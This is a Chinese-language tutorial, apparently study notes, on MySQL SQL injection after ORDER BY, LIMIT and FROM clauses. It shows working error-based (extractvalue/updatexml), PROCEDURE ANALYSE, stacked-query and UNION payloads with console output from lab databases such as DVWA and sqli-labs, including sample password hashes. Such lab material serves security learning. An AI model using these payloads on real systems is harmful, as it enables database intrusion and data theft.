order by后注入
注入点在 order by后面,order by 后面不能带union select,此处可以利用报错信息进行注入
对于关键词order by来说,如果使用预编译处理,参数绑定为String类型,order by 的参数会被单引号包裹,导致无法排序,不只order by,凡是字符串但又不能加引号的位置都不能参数化;包括sql关键字、库名表名字段名函数名等等,否则就会产生了语法错误
desc或者asc(升序or降序排列)显示结果不同,则表明可以注入
mysql> select * from users order by 1 desc;
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
| user_id | first_name | last_name | user | password | avatar | last_login | failed_login |
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
| 5 | Bob | Smith | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/smithy.jpg | 2019-09-12 11:23:53 | 0 |
| 4 | Pablo | Picasso | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 | /hackable/users/pablo.jpg | 2019-09-12 11:23:53 | 0 |
| 3 | Hack | Me | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b | /hackable/users/1337.jpg | 2019-09-12 11:23:53 | 0 |
| 2 | Gordon | Brown | gordonb | e99a18c428cb38d5f260853678922e03 | /hackable/users/gordonb.jpg | 2019-09-12 11:23:53 | 0 |
| 1 | admin | admin | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/admin.jpg | 2019-10-06 14:59:01 | 8 |
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
5 rows in set (0.00 sec)
mysql> select * from users order by 1 asc;
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
| user_id | first_name | last_name | user | password | avatar | last_login | failed_login |
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
| 1 | admin | admin | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/admin.jpg | 2019-10-06 14:59:01 | 8 |
| 2 | Gordon | Brown | gordonb | e99a18c428cb38d5f260853678922e03 | /hackable/users/gordonb.jpg | 2019-09-12 11:23:53 | 0 |
| 3 | Hack | Me | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b | /hackable/users/1337.jpg | 2019-09-12 11:23:53 | 0 |
| 4 | Pablo | Picasso | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 | /hackable/users/pablo.jpg | 2019-09-12 11:23:53 | 0 |
| 5 | Bob | Smith | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/smithy.jpg | 2019-09-12 11:23:53 | 0 |
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
5 rows in set (0.00 sec)
select * from users order by 1 and (extractvalue(1,concat(0x3a,version())),1);
mysql> select * from users order by 1 and (extractvalue(1,concat(0x3a,version())),1);
ERROR 1105 (HY000): XPATH syntax error: ':8.0.12'
mysql> select * from users order by 1 and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'
sqli-labs第46关有order注入,感兴趣的可以自己试试
limit后注入
方法仅适用于5.0.0<mysql<5.6.6的版本
使用PROCEDURE ANALYSE 配合报错注入
select * from users limit 0,2 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
堆叠注入也可以
mysql> select * from users limit 0,2;show databases;
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
| user_id | first_name | last_name | user | password | avatar | last_login | failed_login |
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
| 1 | admin | admin | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/admin.jpg | 2019-10-06 14:59:01 | 8 |
| 2 | Gordon | Brown | gordonb | e99a18c428cb38d5f260853678922e03 | /hackable/users/gordonb.jpg | 2019-09-12 11:23:53 | 0 |
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
2 rows in set (0.00 sec)
+--------------------+
| Database |
+--------------------+
| bwapp |
| challenges |
| dvwa |
| information_schema |
| mysql |
| performance_schema |
| pikachu |
| pkxss |
| root |
| security |
| sys |
+--------------------+
14 rows in set (0.00 sec)
from 后面的注入
结合 order by 猜测列数,然后使用联合注入来注入
mysql> select * from users order by 8;
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
| user_id | first_name | last_name | user | password | avatar | last_login | failed_login |
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
| 2 | Gordon | Brown | gordonb | e99a18c428cb38d5f260853678922e03 | /hackable/users/gordonb.jpg | 2019-09-12 11:23:53 | 0 |
| 3 | Hack | Me | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b | /hackable/users/1337.jpg | 2019-09-12 11:23:53 | 0 |
| 4 | Pablo | Picasso | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 | /hackable/users/pablo.jpg | 2019-09-12 11:23:53 | 0 |
| 5 | Bob | Smith | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/smithy.jpg | 2019-09-12 11:23:53 | 0 |
| 1 | admin | admin | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/admin.jpg | 2019-10-06 14:59:01 | 8 |
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
5 rows in set (0.00 sec)
mysql> select * from users union select 1,2,3,4,user(),6,7,8;
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
| user_id | first_name | last_name | user | password | avatar | last_login | failed_login |
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
| 1 | admin | admin | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/admin.jpg | 2019-10-06 14:59:01 | 8 |
| 2 | Gordon | Brown | gordonb | e99a18c428cb38d5f260853678922e03 | /hackable/users/gordonb.jpg | 2019-09-12 11:23:53 | 0 |
| 3 | Hack | Me | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b | /hackable/users/1337.jpg | 2019-09-12 11:23:53 | 0 |
| 4 | Pablo | Picasso | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 | /hackable/users/pablo.jpg | 2019-09-12 11:23:53 | 0 |
| 5 | Bob | Smith | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 | /hackable/users/smithy.jpg | 2019-09-12 11:23:53 | 0 |
| 1 | 2 | 3 | 4 | root@localhost | 6 | 7 | 8 |
+---------+------------+-----------+---------+----------------------------------+-----------------------------+---------------------+--------------+
6 rows in set (0.00 sec)